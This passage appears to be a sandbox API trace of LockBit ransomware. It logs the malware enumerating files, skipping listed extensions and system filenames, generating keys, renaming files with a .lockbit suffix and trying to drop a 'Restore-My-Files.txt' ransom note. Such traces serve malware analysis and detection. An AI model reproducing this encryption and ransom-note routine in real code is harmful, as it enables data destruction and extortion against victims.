(in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF.lockbit") returned 72 [0173.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03014_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0173.409] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.409] malloc (_Size=0x40068) returned 0x3ef0008 [0173.409] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=18898) returned 1 [0173.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.410] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.414] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.414] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.416] free (_Block=0x1fa2ed8) [0173.416] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.416] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.416] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.416] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x78af, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03041I.JPG", cAlternateFileName="")) returned 1 [0173.416] lstrcmpiW (lpString1=".", lpString2="PH03041I.JPG") returned -1 [0173.416] lstrcmpiW (lpString1="..", lpString2="PH03041I.JPG") returned -1 [0173.416] PathFindExtensionW (pszPath="PH03041I.JPG") returned=".JPG" [0173.416] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.416] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.416] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.417] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.417] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.418] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.418] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03041I.JPG") returned 1 [0173.418] lstrcmpiW (lpString1="ntldr", lpString2="PH03041I.JPG") returned -1 [0173.418] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03041I.JPG") returned -1 [0173.418] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03041I.JPG") returned -1 [0173.418] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03041I.JPG") returned -1 [0173.419] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03041I.JPG") returned 1 [0173.419] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03041I.JPG") returned -1 [0173.419] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.419] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG") returned=".JPG" [0173.419] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.419] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.419] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.419] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.419] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.419] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.419] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.419] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.420] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.420] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG.lockbit") returned 72 [0173.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03041i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.421] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.421] malloc (_Size=0x40068) returned 0x3f70048 [0173.422] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=30895) returned 1 [0173.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0173.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0173.423] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0173.430] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.430] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.430] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.431] free (_Block=0x1fa2ed8) [0173.431] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.431] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.432] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7450, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03143I.JPG", cAlternateFileName="")) returned 1 [0173.432] lstrcmpiW (lpString1=".", lpString2="PH03143I.JPG") returned -1 [0173.432] lstrcmpiW (lpString1="..", lpString2="PH03143I.JPG") returned -1 [0173.432] PathFindExtensionW (pszPath="PH03143I.JPG") returned=".JPG" [0173.432] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.432] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.432] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.433] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.433] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03143I.JPG") returned 1 [0173.433] lstrcmpiW (lpString1="ntldr", lpString2="PH03143I.JPG") returned -1 [0173.434] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03143I.JPG") returned -1 [0173.434] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03143I.JPG") returned -1 [0173.434] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03143I.JPG") returned -1 [0173.434] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03143I.JPG") returned 1 [0173.434] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03143I.JPG") returned -1 [0173.434] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.434] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG") returned=".JPG" [0173.434] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.434] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.434] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.434] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.434] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.434] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.434] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.435] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.435] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG.lockbit") returned 72 [0173.435] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03143i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.436] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.436] malloc (_Size=0x40068) returned 0x3fb00b8 [0173.437] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=29776) returned 1 [0173.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0173.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0173.439] ReadFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0173.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.447] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.447] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.448] free (_Block=0x1fa2ed8) [0173.448] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.448] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.448] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.448] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa343, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03205I.JPG", cAlternateFileName="")) returned 1 [0173.449] lstrcmpiW (lpString1=".", lpString2="PH03205I.JPG") returned -1 [0173.449] lstrcmpiW (lpString1="..", lpString2="PH03205I.JPG") returned -1 [0173.449] PathFindExtensionW (pszPath="PH03205I.JPG") returned=".JPG" [0173.449] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.449] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.449] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.450] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.450] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 